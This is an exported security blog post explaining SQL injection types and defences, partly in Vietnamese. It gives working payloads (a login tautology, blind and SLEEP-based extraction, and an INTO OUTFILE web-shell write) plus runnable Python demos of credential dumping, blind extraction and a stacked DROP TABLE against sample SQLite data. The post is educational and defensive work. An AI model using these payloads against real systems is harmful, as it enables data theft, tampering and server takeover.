{"id":505,"date":"2022-08-06T22:53:54","date_gmt":"2022-08-06T22:53:54","guid":{"rendered":"https:\/\/securitybriefing.net\/?p=505"},"modified":"2022-08-06T22:53:54","modified_gmt":"2022-08-06T22:53:54","slug":"sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong","status":"publish","type":"post","link":"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/","title":{"rendered":"SQL Injection 101: What SQLi is and how to prevent attacks"},"content":{"rendered":"<h2 class=\"wp-block-heading\" id=\"what-is-sql-injection\"><strong>What is SQL injection<\/strong><\/h2>\n\n\n<p>SQL injection (SQLi) is a class of attack in which an attacker gets a vulnerable web application to execute SQL statements of the attacker's choosing. By bypassing the application's access controls at the query level, the attacker can read sensitive data such as customer records, personal data and trade secrets, and often modify or delete it as well. This article explains what SQL injection is, how it works and how you can prevent attacks.<\/p>\n\n\n\n<p>SQL injection can affect any website that builds SQL queries from untrusted input, whatever SQL database sits behind it. A successful attack gives the attacker access to your most important data: consumer information, personal data, trade secrets and intellectual property. According to OWASP, injection is one of the most serious classes of vulnerability in web applications.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"types-of-sql-injection\"><strong>Types of SQL injection<\/strong><\/h2>\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"542\" class=\"wp-image-515\" src=\"http:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2.png\" alt=\"Types of SQL injection\" srcset=\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2.png 1024w, https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2-300x159.png 300w, https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/types-of-SQL-Injectin-2-768x407.png 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n<h3 class=\"wp-block-heading\" id=\"inband-sqli\"><strong>In-band SQLi<\/strong><\/h3>\n\n\n<p>In-band SQL injection is an attack in which the attacker uses the same channel to send the injected query and to receive its result: the data comes back in the HTTP response to the request that carried the payload. The attacker's goal is to see the result immediately in the web browser, which is what makes this form practical to exploit by hand.<\/p>\n\n\n\n<p><strong>Example of in-band SQL injection<\/strong><\/p>\n\n\n\n<p>The most common way to carry out in-band SQL injection is to alter a request parameter so that the query returns rows the attacker is not entitled to see. For example, if a statement is meant to display the current user's profile, the attacker changes the value sent with the request so that the statement matches other users' rows instead.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">SELECT * FROM users WHERE user_id LIKE 'current_user'<\/pre>\n\n\n\n<p>Note that this query compares with LIKE rather than =, so the attacker does not even need to break out of the quotes: a user_id of % matches every row.<\/p>\n\n\n\n<p>Error-based SQLi and union-based SQLi are the two most common forms of in-band SQL injection.<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"errorbased-sqli\"><strong>Error-based SQLi<\/strong><\/h4>\n\n\n<p>Error-based SQLi is an in-band technique that exploits the error messages returned by the database server to map out the structure of the database. When the application shows raw errors, a single malformed input reveals the DBMS product and often its version and fragments of the query being built, and on some engines specially crafted expressions make the error message itself carry query results. It is one of the most common forms of in-band SQL injection.<\/p>\n\n\n\n<p><strong>Example of error-based SQLi:<\/strong><\/p>\n\n\n\n<p>Suppose an attacker tries to log in with the following credentials:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">username: ' OR 'a'='a\npassword: anything<\/pre>\n\n\n\n<p>The first quote closes the string literal in the query, so the rest of the input is parsed as SQL. As submitted, the statement is actually syntactically valid and turns the username check into a tautology (although, because AND binds more tightly than OR, the password condition still has to match a row unless the same payload is placed in the password field instead). The error-based signal comes from inputs that break the syntax, for example a lone quote that leaves a string unterminated: the database rejects the statement, and if the application displays the resulting error message it discloses details of the database that the attacker can use to refine the next payload.<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"unionbased-sqli\"><strong>Union-based SQLi:<\/strong><\/h4>\n\n\n<p>Union-based SQL injection is an in-band technique that uses the UNION operator to combine the results of the application's own SELECT with those of an attacker-supplied SELECT, so that rows from other tables are rendered wherever the application displays its normal results. The injected SELECT must return the same number of columns with compatible types, which the attacker works out first with ORDER BY or NULL-padding probes.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"blind-sql-injection\"><strong>Blind SQL injection<\/strong><\/h3>\n\n\n<p>Blind SQL injection is an attack in which the attacker extracts answers from the database by asking questions that produce a true-or-false response. Instead of reading query output or error messages, the attacker watches whether the application behaves differently when one injected condition is used rather than another.<\/p>\n\n\n\n<p>When an application is badly configured it may display database warnings revealing that a query's syntax was wrong; when it neither shows errors nor reflects query output, the attacker is left with a blind injection. Blind SQL injection works like classic SQL injection except in how the data is retrieved: because the response contains nothing useful directly, the attacker has to ask a long series of yes/no questions to reconstruct it.<\/p>\n\n\n\n<p>Blind SQL injection is divided into boolean-based blind SQLi and time-based blind SQLi.<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"booleanbased-blind-sqli\"><strong>Boolean-based blind SQLi<\/strong><\/h4>\n\n\n<p>Boolean-based blind SQL injection asks the database a question whose answer is true or false and reads that answer from the application's response. 
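<\/p>

<p>Added example, not code from the original article: a self-contained Python script with an in-process SQLite database and constructed rows that demonstrates the in-band techniques from the previous section (an error-based probe and UNION-based extraction) and the boolean-based blind technique just defined, all against one vulnerable product search. The products and users tables, their rows and the search_products_vulnerable function are assumptions made for the example; SQLite is used so that the script runs anywhere, so its error text and SUBSTR syntax differ slightly from MySQL.<\/p>

```python
import sqlite3

# Constructed sample database for the demonstration (not real data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'winter24'), (2, 'bob', 'hunter2');
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
    """)
    return db

def search_products_vulnerable(db, term):
    """VULNERABLE on purpose: the search term is spliced into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return db.execute(sql).fetchall()

def error_probe(db):
    """Error-based: a lone quote leaves an unterminated string literal, the
    engine rejects the statement and its message identifies the DBMS."""
    try:
        search_products_vulnerable(db, "'")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

def union_dump_credentials(db):
    """Union-based: append a SELECT with the same column count (2) so the
    users table is rendered where product rows normally appear."""
    payload = "zzz%' UNION SELECT username, password FROM users -- "
    return search_products_vulnerable(db, payload)

def boolean_oracle(db, condition):
    """Boolean-based blind: the page lists 'widget' only if condition is true."""
    payload = f"widget' AND ({condition}) -- "
    return len(search_products_vulnerable(db, payload)) > 0

def extract_blind(db, subquery, charset="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32):
    """Recover the result of subquery one character at a time via the oracle.
    SUBSTR is 1-based; past the end it returns '' and nothing matches."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if boolean_oracle(db, f"SUBSTR(({subquery}), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the value
    return recovered

if __name__ == "__main__":
    db = make_db()
    print(error_probe(db))
    print(union_dump_credentials(db))
    print(extract_blind(db, "SELECT password FROM users WHERE username='bob'"))
```

<p>Each character costs up to one request per candidate against the boolean oracle, so real tooling orders the charset by frequency or binary-searches the character code; the point of the example is that a single true/false difference in the page is enough to read any value the query can reach.<\/p>

<p>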
The attacker compares the responses for a condition known to be true and one known to be false; any stable difference, in page content, response length or status code, becomes a one-bit channel that is queried over and over.<\/p>\n\n\n\n<p>Example of boolean-based blind SQLi:<\/p>\n\n\n\n<p>If an attacker wants to find out what database they are dealing with, they append a condition that is true only for the name they are guessing (database() is the MySQL function that returns the current schema name):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">SELECT * FROM users WHERE user_id LIKE 'current_user' AND database() LIKE '%type%'<\/pre>\n\n\n\n<p>Here %type% stands for the guess under test. The attacker substitutes a candidate name, or one character at a time, and watches whether the page still shows the user's data: if it does, the guess was right. If the quoting is wrong the statement becomes invalid instead, and a MySQL server whose errors reach the page answers with a message like the following, which is in itself an error-based leak confirming the product:<\/p>\n\n\n\n<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and database() like '%type%'' at line 1<\/p>\n\n\n<h4 class=\"wp-block-heading\" id=\"timebased-blind-sql-injection\"><strong>Time-based blind SQL injection<\/strong><\/h4>\n\n\n<p>A time-based blind attack sends the server a SQL statement containing code that makes the query execute more slowly, but only when a chosen condition is true.<\/p>\n\n\n\n<p>Time-based blind attacks let the attacker extract data from the response time alone. Since no query output flows from the database back to the attacker, this is also called an inferential attack; the only signal is whether the response was delayed.<\/p>\n\n\n\n<p>The response time tells the attacker whether the answer was true. If the response comes back without delay, the intruder moves on to the next guess. The technique is slow because the attacker has to work through the target value one character at a time, which adds up against large databases, so real attacks use short delays and are automated.<\/p>\n\n\n\n<p><strong>Example of time-based blind SQLi<\/strong><\/p>\n\n\n\n<p>In this example the attacker wants to determine whether a user with id=999 exists in the database and whether their password begins with a guessed value. To do this they inject the following expression (MySQL syntax):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">IF(SUBSTRING((SELECT password FROM users WHERE user_id=999), 1, LENGTH('secret'))='secret', SLEEP(30), 'false')<\/pre>\n\n\n\n<p>If the user with id 999 exists and their password is secret, the application sleeps for 30 seconds before responding. If the user does not exist, the subquery yields NULL, the comparison is not true and IF returns 'false' immediately, so the response is fast. Two details matter in practice: SUBSTRING positions are 1-based in MySQL (a start position of 0 returns an empty string and the test never fires), and the length function is LENGTH or CHAR_LENGTH, not LEN. A delay of a second or two is enough to be measurable and far less conspicuous than 30 seconds; repeating the test one character at a time recovers the whole password.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"outofband-sqli\"><strong>Out-of-band SQLi<\/strong><\/h3>\n\n\n<p>Someone who wants to steal data can have the database server send it over a channel that is not part of the normal communication between the server and its clients. This is done by making the database server itself issue a network request, usually a DNS lookup or an HTTP request, to a host the attacker controls, with the stolen data embedded in the hostname or URL.<\/p>\n\n\n\n<p>This is the technique of choice when the application's response does not change depending on whether data was returned, whether the database reported a problem, or how long the query took to run. 
Out-of-band interactions can be triggered at will and, by tying them to an injected condition, triggered only when that condition holds, so that knowledge is gathered one bit at a time as in a blind attack. Which functions can make such a request depends on the DBMS: xp_dirtree on Microsoft SQL Server, the UTL_HTTP package on Oracle and LOAD_FILE with a UNC path on MySQL for Windows are well-known examples.<\/p>\n\n\n\n<p>Data can also leak through other network protocols from the same kind of interaction. The figure represents the request sent from the web application to the application's database.<\/p>\n\n\n\n<p><strong>Example of out-of-band SQLi<\/strong><\/p>\n\n\n\n<p>In this example the attacker abuses a login query to make the database write a file onto the server. Supplying the payload as the password value yields the following statement (MySQL syntax; $username, $password and $filename are the application's variables):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">SELECT user_id FROM users WHERE username='$username' AND password='$password' LIMIT 0,0 UNION SELECT '' INTO OUTFILE '\/var\/opt\/databases\/$filename.php'; --<\/pre>\n\n\n\n<p>LIMIT 0,0 discards every row of the application's own SELECT, and the UNION supplies the content to be written; the empty string stands in for the attacker's PHP payload and must have the same column count as the first SELECT (one column, as shown). 
The file is written whenever the statement executes, whether or not the credentials match, because INTO OUTFILE applies to the whole result set. If the file lands in a directory the web server executes, the attacker then requests it to run commands on the server. This only works when the database account holds the FILE privilege, secure_file_priv does not restrict the target directory and the database process can write to a web-served path, which is one reason the least-privilege advice below matters. Strictly speaking this is a file-write primitive rather than a network out-of-band channel; the DNS and HTTP techniques above are the pure out-of-band form.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"how-to-prevent-an-sql-injection\"><strong>How to prevent SQL injection<\/strong><\/h2>\n\n\n<p>The best way to protect against SQL injection attacks is to use parameterized queries (prepared statements), backed by input validation. Code should never splice user input directly into SQL text. Developers must treat all input as untrusted, not only the obvious web forms such as a login form: URL parameters, cookies, HTTP headers and values read back from the database are all attacker-influenced. Stripping or escaping single quotes from suspicious input is not a substitute for parameterization; it is easy to get wrong and does nothing for numeric contexts, where no quote is needed to break out. It is also a good idea to hide database errors on live sites, because error messages reveal details of the database system that an attacker can use to refine an exploit.<\/p>\n\n\n\n<p>If you detect a problem with your site, take it offline immediately and contact your hosting provider. They can help you determine whether the site has been compromised and what steps you need to take to fix the problem; preserve the web server and database logs before anything is rebuilt. In the meantime, make sure that all users of the site know about the problem and change their passwords as soon as possible.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"prevention-tips-for-avoiding-sql-injections\"><strong>Prevention tips for avoiding SQL injection<\/strong><\/h2>\n\n\n<p>There are several ways to avoid SQL injection vulnerabilities in your programming language and database setup. These techniques work with most databases, and the underlying principle, keeping code and data apart, carries over to other query languages such as XPath queries over XML. You can use them to make your database safer.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"1-use-of-properly-constructed-stored-procedures\">1) Use properly constructed stored procedures<\/h3>\n\n\n<p>Beginners should start by learning to write statements with bind variables; this is easier than assembling dynamic queries and easier to read. In a parameterized query the developer writes the complete SQL text first and supplies each parameter value separately, afterwards. This lets the database distinguish code from data: a parameter value is never parsed as SQL, however many quotes or keywords it contains.<\/p>\n\n\n\n<p>Prepared statements ensure that the intent of a query cannot be changed, even if someone tries to slip SQL instructions into a parameter. Stored procedures give the same guarantee only when they are constructed properly, that is, when they take their arguments as parameters and do not build dynamic SQL from them internally with EXEC or PREPARE.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"2-allowlist-input-validation\">2) Allowlist input validation<\/h3>\n\n\n<p>SQL queries use bind variables at specific positions reserved for data. For example, in Python the placeholder is <strong>%s<\/strong> for drivers such as psycopg2 and MySQLdb (sqlite3 uses ?), and the driver, not string formatting, fills it in. 
You can use a regular expression to validate user input against an allowlist of the characters permitted in each bind variable.<\/p>\n\n\n\n<p>In JavaScript, for instance, <strong>\\w<\/strong> matches letters, digits and underscore.<\/p>\n\n\n\n<p>The allowlist should be as specific as possible to avoid false positives.<\/p>\n\n\n\n<p>For example, if you are expecting a US phone number, you could use the following regular expression:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-vivid-green-cyan-color has-black-background-color has-text-color has-background\">\/^1?\\d{10}$\/<\/pre>\n\n\n\n<p>This matches ten digits, optionally preceded by the country code 1 for eleven in total, which is the shape of a US number once separators are removed. If someone tries to submit something like '<strong>abcdef<\/strong>', it does not match and the input is rejected.<\/p>\n\n\n\n<p>This helps ensure your data stays safe and secure. 
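<\/p>

<p>Added example, not code from the original article, covering tips 1 to 3 together: the same login query built by string formatting and as a parameterized query, so that the tautology payload from the error-based example above can be seen to work against one and not the other; allowlist validation of a phone number with the regular expression above; and the identifier-mapping case discussed next in this section, where a user-chosen sort column is looked up in a fixed table because column names cannot be bound as parameters. The users table and its rows are constructed for the example, and sqlite3 is used in place of a server driver, so the placeholder is ? rather than %s.<\/p>

```python
import re
import sqlite3

# Constructed sample table for the demonstration (not real data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'winter24'), (2, 'bob', 'hunter2');
    """)
    return db

def login_vulnerable(db, username, password):
    """String-built query: whatever the user typed is parsed as SQL."""
    sql = (f"SELECT user_id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return [row[0] for row in db.execute(sql).fetchall()]

def login_parameterized(db, username, password):
    """Prepared statement: the SQL text is fixed and the values are bound
    separately. sqlite3 uses '?'; psycopg2 and MySQLdb use '%s' with the same
    calling convention. Never fill placeholders with % or f-strings."""
    sql = "SELECT user_id FROM users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (username, password)).fetchall()]

PHONE_CHARS = re.compile(r"^[0-9-]+$")   # allowlist of characters for the field
US_PHONE = re.compile(r"^1?\d{10}$")      # shape of a US number, separators removed

def validate_us_phone(value):
    """Allowlist validation: reject anything outside the expected character set
    and shape before it gets anywhere near a query."""
    if not PHONE_CHARS.match(value):
        return False
    return US_PHONE.match(value.replace("-", "")) is not None

# Identifiers cannot be bound, so a user-chosen sort key is mapped through a
# fixed table; anything not in the table is rejected outright.
SORT_COLUMNS = {"name": "username", "id": "user_id"}

def list_users_sorted(db, sort_key):
    column = SORT_COLUMNS.get(sort_key)
    if column is None:
        raise ValueError(f"unsupported sort key: {sort_key!r}")
    return [row[0] for row in db.execute(f"SELECT username FROM users ORDER BY {column}")]

if __name__ == "__main__":
    db = make_db()
    tautology = "' OR 'a'='a"
    print(login_vulnerable(db, "nobody", tautology))     # every user_id
    print(login_parameterized(db, "nobody", tautology))  # []
    print(validate_us_phone("415-555-0100"), validate_us_phone("' OR 1=1--"))
    print(list_users_sorted(db, "name"))
```

<p>Note that the tautology is placed in the password field: in the WHERE clause AND binds more tightly than OR, so there it short-circuits the whole condition, whereas in the username field it would still require a matching password.<\/p>

<p>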
If the values you put into a query come from your own code rather than from user parameters, that is fine too.<\/p>\n\n\n\n<p>However, suppose user-supplied values are meant to select particular table or column names, for example the column to sort by. Identifiers cannot be passed as bind variables. In that case the user's value should be mapped, through a fixed lookup table in code, to the corresponding table or column name, so that unvalidated user input never reaches the query text.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"3-use-whitelists\">3) Use allowlists<\/h3>\n\n\n<p>Do not filter user input against a blocklist of bad characters. Using an allowlist of the good characters expected in each specific field is far more effective, because a blocklist is only as complete as its author's imagination and misses alternative encodings and database-specific syntax. This stops SQL injection attacks before they start.<\/p>\n\n\n\n<p>For example, allow only digits and dashes in an input field if you are expecting a phone number. If you are expecting an email address, allow only the characters that are valid in one.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"4-use-the-most-uptodate-platforms\">4) Use the most up-to-date platforms<\/h3>\n\n\n<p>Older web development platforms offer no SQLi protection of their own: PHP's legacy mysql_* functions, for example, had no parameter binding and were removed in PHP 7. Use the latest version of your programming environment, language and related technologies. In PHP, that means PDO or MySQLi with prepared statements instead of the old mysql extension.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"5-scan-your-web-application-regularly\">5) Scan your web application regularly<\/h3>\n\n\n<p>SQL injection flaws can be very hard to spot. It is important to scan your web application for vulnerabilities regularly, with a dynamic scanner against a test instance and static analysis of the code that builds queries, and to scan again after every significant change.<\/p>\n\n\n<h3 class=\"wp-block-heading\" id=\"6-enforcing-least-privilege\">6) Enforce least privilege<\/h3>\n\n\n<p>The principle of least privilege is a security concept that restricts users to the minimum access needed to do their job. It covers both the number of accounts a user has and the permissions those accounts carry.<\/p>\n\n\n\n<p>In practice this means restricting the rights of users, service accounts and processes to only those resources required for their basic, sanctioned tasks, while still leaving people enough access to do their work effectively. For a web application, the account used to connect to the database should be able to read and write only the tables it actually needs, and should never hold administrative rights or dangerous privileges such as MySQL's FILE, on which the INTO OUTFILE example above depends.<\/p>\n\n\n\n<p>Least privilege also requires that applications, systems and devices hold only the permissions necessary to complete a specific task. That way the impact is contained if someone manages to exploit a vulnerability and cause damage. 
This is the opposite of giving users more rights than they need, which greatly increases the harm an SQL injection attack can do: with a read-only account the attacker reads data, with an administrative account they can alter data, write files or run operating-system commands.<\/p>\n\n\n<h2 class=\"wp-block-heading\" id=\"sql-injection-frequently-asked-questions\"><strong>SQL Injection \u2013 Frequently asked questions<\/strong><\/h2>\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\u00a0<\/div><\/div>\n\n\n\n<div class=\"schema-faq wp-block-yoast-faq-block\">\n<div id=\"faq-question-1659826159348\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is the most common SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">In-band SQL injection is the most common type of SQL injection attack. It occurs when the attacker can use the same communication channel both to send the payload and to collect the results.<\/p>\n<\/div>\n<div id=\"faq-question-1659826187832\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is the best defense against SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">The best defense against SQL injection is to use parameterized queries. This kind of query uses placeholders for the parameters, whose values are supplied separately when the statement is executed. 
This lets the database distinguish code from data.<\/p>\n<\/div>\n<div id=\"faq-question-1659826216670\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">How is SQL injection detected?<\/strong>\n<p class=\"schema-faq-answer\">SQL injection can be detected in several ways. One method is a web application firewall (WAF), a hardware or software component that sits between the web application and the internet, inspects traffic for malicious activity and can block SQL injection attempts. A WAF is a supplementary control that a determined attacker can often bypass, so it complements rather than replaces parameterized queries. Application and database logs (unexpected syntax errors, UNION or SLEEP keywords inside parameters, unusually long requests) and regular vulnerability scanning are the other main sources of detection.<\/p>\n<\/div>\n<div id=\"faq-question-1659826245103\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is second-order SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">Second-order SQL injection occurs when an attacker can inject a payload that the web application stores safely at first and later reuses unsafely in another query, where it is executed. 
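<\/p>

<p>Added example, not code from the original article, of the second-order case just described: a username is stored safely with a bound parameter at registration, then read back from the database and, being treated as trusted data, spliced into a later UPDATE. The users table, the admin row and the register/rename functions are constructed for the example and run on an in-process SQLite database.<\/p>

```python
import sqlite3

# Constructed sample schema (not real data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT PRIMARY KEY, display_name TEXT);
        INSERT INTO users VALUES ('admin', 'Site Admin');
    """)
    return db

def register(db, username):
    """First order: the bound parameter stops injection here, so the payload
    is stored verbatim, quote and comment marker included."""
    db.execute("INSERT INTO users (username, display_name) VALUES (?, ?)",
               (username, username))

def rename_vulnerable(db, username, new_display):
    """Second order: the username is read back from the database and, as
    'trusted' data, concatenated into the next statement."""
    stored = db.execute("SELECT username FROM users WHERE username=?",
                        (username,)).fetchone()[0]
    sql = f"UPDATE users SET display_name='{new_display}' WHERE username='{stored}'"
    db.execute(sql)

def rename_fixed(db, username, new_display):
    """Same flow with every value bound, whatever its origin."""
    db.execute("UPDATE users SET display_name=? WHERE username=?",
               (new_display, username))

def display_name(db, username):
    return db.execute("SELECT display_name FROM users WHERE username=?",
                      (username,)).fetchone()[0]

def demo(fix=False):
    """Returns (admin's display name, attacker's display name) after the attack."""
    db = make_db()
    attacker = "admin'-- "   # stored payload: the comment swallows the closing quote
    register(db, attacker)
    (rename_fixed if fix else rename_vulnerable)(db, attacker, "pwned")
    return display_name(db, "admin"), display_name(db, attacker)

if __name__ == "__main__":
    print(demo(fix=False))  # admin's row is changed, the attacker's is untouched
    print(demo(fix=True))   # only the attacker's own row changes
```

<p>The stored value 'admin'-- ' closes the string in the later UPDATE and comments out the rest, so the WHERE clause becomes username='admin' and the attacker renames someone else's account. Validation at the registration form would not have helped; only binding the value at every use does.<\/p>

<p class=\"schema-faq-answer\">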
This kind of attack is harder to achieve because the attacker must find a code path that triggers execution of the stored payload; it also slips past input validation that only happens at the point of entry.<\/p>\n<\/div>\n<div id=\"faq-question-1659826275267\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is blind SQL injection?<\/strong>\n<p class=\"schema-faq-answer\">Blind SQL injection is an attack in which the attacker does not directly see the result of their payload. Instead they must use true-or-false statements to infer information from the database, one bit at a time. This kind of attack is slower to carry out but, with automation, just as dangerous as other types of SQL injection.<\/p>\n<\/div>\n<div id=\"faq-question-1659826301781\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">What is a stacked query?<\/strong>\n<p class=\"schema-faq-answer\">A stacked query is a type of SQL injection in which the attacker terminates the application's statement with a semicolon and appends statements of their own, which allows commands such as INSERT, UPDATE, DROP or stored-procedure calls rather than only reading data. 
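<\/p>

<p>Added example, not code from the original article, showing why stacked queries depend on the driver: the same string-built lookup is run through the sqlite3 module's execute(), which compiles a single statement and rejects any SQL left over, and through executescript(), which runs every statement in the batch the way multi-statement drivers do. The products table and the payload are constructed for the example; the payload opens a final SELECT so that the application's own closing quote is consumed without a comment marker.<\/p>

```python
import sqlite3

# Constructed sample table (not real data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("CREATE TABLE products (name TEXT); INSERT INTO products VALUES ('widget');")
    return db

# Closes the application's string literal, ends its statement, appends a DROP,
# then opens a SELECT that the application's trailing quote completes.
STACKED_PAYLOAD = "x'; DROP TABLE products; SELECT 'done"

def build_query(term):
    """Deliberately vulnerable: the search term is spliced into the SQL text."""
    return f"SELECT name FROM products WHERE name='{term}'"

def lookup_single_statement(db, term):
    """execute() compiles one statement and refuses the SQL left over after it
    (ProgrammingError in current Python, Warning in older versions), so the
    stacked DROP is rejected rather than run."""
    try:
        return db.execute(build_query(term)).fetchall()
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:
        return f"rejected: {exc}"

def lookup_multi_statement(db, term):
    """executescript() behaves like drivers that run whole batches: every
    statement in the payload executes."""
    db.executescript(build_query(term))
    return "executed"

def table_exists(db, name):
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                     (name,)).fetchone()
    return row is not None

def demo():
    """Returns (single-statement result, table still present after it,
    table gone after the multi-statement path)."""
    db = make_db()
    single = lookup_single_statement(db, STACKED_PAYLOAD)
    still_there = table_exists(db, "products")
    lookup_multi_statement(db, STACKED_PAYLOAD)
    gone = not table_exists(db, "products")
    return single, still_there, gone

if __name__ == "__main__":
    print(demo())
```

<p>The single-statement path is still injectable (a UNION or a boolean condition inside the one statement works as before); what the driver's refusal removes is only the ability to append whole new statements. Treat that as a property of the client library, not as a defence.<\/p>

<p class=\"schema-faq-answer\">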
Lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y kh\u00f3 th\u1ef1c hi\u1ec7n h\u01a1n nh\u01b0ng c\u00f3 th\u1ec3 r\u1ea5t nguy hi\u1ec3m n\u1ebfu th\u00e0nh c\u00f4ng.<\/p>\n<\/div>\n<div id=\"faq-question-1659826330814\" class=\"schema-faq-section\"><strong class=\"schema-faq-question\">SQL injection d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 g\u00ec?<\/strong>\n<p class=\"schema-faq-answer\">SQL injection d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng c\u00e1c l\u1ed7i c\u01a1 s\u1edf d\u1eef li\u1ec7u \u0111\u1ec3 suy lu\u1eadn th\u00f4ng tin t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u. Cu\u1ed9c t\u1ea5n c\u00f4ng n\u00e0y kh\u00f3 th\u1ef1c hi\u1ec7n h\u01a1n nh\u01b0ng c\u00f3 th\u1ec3 r\u1ea5t nguy hi\u1ec3m n\u1ebfu th\u00e0nh c\u00f4ng.<\/p>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>SQL injection l\u00e0 g\u00ec? SQL injection (SQLi) l\u00e0 m\u1ed9t lo\u1ea1i t\u1ea5n c\u00f4ng cho ph\u00e9p t\u1ed9i ph\u1ea1m th\u1ef1c thi c\u00e1c c\u00e2u l\u1ec7nh SQL \u0111\u1ed9c h\u1ea1i \u0111\u1ed1i v\u1edbi c\u00e1c \u1ee9ng d\u1ee5ng web d\u1ec5 b\u1ecb t\u1ea5n c\u00f4ng. 
K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 truy c\u1eadp d\u1eef li\u1ec7u nh\u1ea1y c\u1ea3m, ch\u1eb3ng h\u1ea1n nh\u01b0\u2026 <a class=\"more-link\" href=\"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/\">Ti\u1ebfp t\u1ee5c \u0111\u1ecdc <span class=\"screen-reader-text\">SQL Injection 101: SQLi l\u00e0 g\u00ec v\u00e0 c\u00e1ch ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng<\/span><\/a><\/p>","protected":false},"author":1,"featured_media":644,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27],"tags":[],"class_list":["post-505","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","entry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>What is SQLi and How to Prevent Attacks | securitybriefing<\/title>\n<meta name=\"description\" content=\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/\" \/>\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"What is SQLi and How to Prevent Attacks | 